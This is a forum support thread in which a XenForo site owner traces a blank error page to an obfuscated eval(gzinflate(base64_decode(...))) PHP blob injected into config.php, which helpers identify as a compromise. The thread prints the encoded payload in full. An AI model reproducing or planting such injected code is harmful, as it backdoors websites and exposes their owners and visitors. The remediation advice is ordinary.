1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

XF 1.5 database error

Discussion in 'Troubleshooting and Problems' started by denisx04, Nov 6, 2015.

  1. denisx04

    denisx04 Active Member

    Just a white page that says

    An unexpected error occurred. Please try again later.


    Its been happening a lot now and I'm not sure what causes it or how to fix it my url is www.enixorigin.com any ideas or suggestions?
     
  2. Brogan

    Brogan XenForo Moderator Staff Member

    If it's happening sporadically then it could point to server issues.

    Enabling debug mode will show more details related to the error.

    There should also be entries in the ACP error log.
     
  3. denisx04

    denisx04 Active Member

    Brogan thank you for your reply, its been months since I've logged on the ACP since being overseas with my family and I completely forgot the admin link I thought it was link.com/admin but looks like I'm wrong
     
  4. Brogan

    Brogan XenForo Moderator Staff Member

    It's url/admin.php

    However, you may not be able to access that depending on the nature of the problem.

    Enabling debug mode is likely the only option to get more details.
     
  5. denisx04

    denisx04 Active Member

    Thank you again, I enabled debug mode and my log has this error

    Zend_Controller_Response_Exception: Cannot send headers; headers already sent in /home/enixor/public_html/forum/library/config.php, line 6 - library/Zend/Controller/Response/Abstract.php:321
    Generated By: Unknown Account, A moment ago
    Stack Trace
    #0 /home/enixor/public_html/forum/library/Zend/Controller/Response/Abstract.php(115): Zend_Controller_Response_Abstract->canSendHeaders(true)
    #1 /home/enixor/public_html/forum/library/XenForo/ViewRenderer/Abstract.php(63): Zend_Controller_Response_Abstract->setHeader('X-Frame-Options', 'SAMEORIGIN')
    #2 /home/enixor/public_html/forum/library/XenForo/ViewRenderer/HtmlPublic.php(18): XenForo_ViewRenderer_Abstract->__construct(Object(XenForo_Dependencies_Public), Object(Zend_Controller_Response_Http), Object(Zend_Controller_Request_Http))
    #3 /home/enixor/public_html/forum/library/XenForo/Dependencies/Public.php(207): XenForo_ViewRenderer_HtmlPublic->__construct(Object(XenForo_Dependencies_Public), Object(Zend_Controller_Response_Http), Object(Zend_Controller_Request_Http))
    #4 /home/enixor/public_html/forum/library/XenForo/FrontController.php(547): XenForo_Dependencies_Public->getViewRenderer(Object(Zend_Controller_Response_Http), 'html', Object(Zend_Controller_Request_Http))
    #5 /home/enixor/public_html/forum/library/XenForo/FrontController.php(141): XenForo_FrontController->_getViewRenderer('html')
    #6 /home/enixor/public_html/forum/index.php(18): XenForo_FrontController->run()
    #7 {main}
    Request State
    array(3) {
    ["url"] => string(73) "http://www.enixorigin.com/forum/threads/colorless-infinity-spectrum.2220/"
    ["_GET"] => array(0) {
    }
    ["_POST"] => array(0) {
    }
    }
     
  6. Brogan

    Brogan XenForo Moderator Staff Member

    That sounds like a corrupt config.php file.

    Can you post the contents here, blanking out the database name, user, and password.
     
  7. denisx04

    denisx04 Active Member

    $config['db']['host'] = 'localhost';
    $config['db']['port'] = '3306';
    $config['db']['username'] = 'enixor_den';
    $config['db']['password'] = '';
    $config['db']['dbname'] = '';

    $config['cache']['enabled'] = true;
    $config['cache']['frontend'] = 'Core';
    $config['cache']['frontendOptions']['cache_id_prefix'] = 'enx_';

    $config['debug'] = true;

    $config['superAdmins'] = '1,8';
     
  8. Tracy Perry

    Tracy Perry Well-Known Member

    Make sure that there is not a new line after your '1,8';
    That needs to be the last line in the file. Also, what did you edit your config.php with? Load it up in mc (midnight commander) if you have it on your system and see if there are any unusual characters visible on any lines.
     
  9. denisx04

    denisx04 Active Member

    Hey Tracy, that's the first thing I checked and I can confirm there is no new line after the 1,8;. Not sure what midnight commander is but I will look into it. Many thanks for the suggestion.
     
  10. AndyB

    AndyB Well-Known Member

    Line 6 is your password.

    $config['db']['password'] = '';

    Double check you have the correct password for MySQL.
     
  11. denisx04

    denisx04 Active Member

    I verified that my password was correct, that was one of the first things I looked at as well.
     
  12. denisx04

    denisx04 Active Member

    I forgot to mention, it does have some weird gibberish at the beginning of the file. Its really long just random words. I have no clue what it is. But its basically this...

    Code:
    <?php eval(gzinflate(base64_decode('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')));?><?php
     
  13. Tracy Perry

    Tracy Perry Well-Known Member

    At the begininng of what file? The config.php? it's not normally a good thing to see a
    Code:
    gzinflate(base64_decode
    in it. Frequently used in hacks. So where do you see that?
     
  14. denisx04

    denisx04 Active Member

    I'll attach the file without my db name and password.
     

    Attached Files:

  15. Tracy Perry

    Tracy Perry Well-Known Member

    You've been hacked... are you using WordPress anywhere by chance?
     
  16. Brogan

    Brogan XenForo Moderator Staff Member

    That does look like the file has been compromised.

    There's no easy solution now.
    You will need to sanitise the entire server files and database, as well as fixing the original hole which allowed the hacker to gain access.
     
  17. denisx04

    denisx04 Active Member

    Yes, I am, could that be why? Do I need to delete everything and start from scratch?
     
  18. Tracy Perry

    Tracy Perry Well-Known Member

    Replace it with this one, but you still need to find the attack vector.
     

    Attached Files:

  19. Brogan

    Brogan XenForo Moderator Staff Member

    And remove any backdoors which may have been installed.
     
  20. Tracy Perry

    Tracy Perry Well-Known Member

    You HAVE to keep up with WordPress versions and add-ons in use. There have been multiple attack vectors found in it over the last several months (I normally am having to do updates every couple of days on my sites).

    Every PHP file is going to be in question. Best thing to do is wipe the VPS and start it over and make sure you have updated everything. You also will need to change any of your SSH passwords (yours and root) and any DB passwords for WP and XenForo.

    You can probably keep the DB's, but I'd have questions on the WP one. You will need to replace all the files with new versions.
     

Share This Page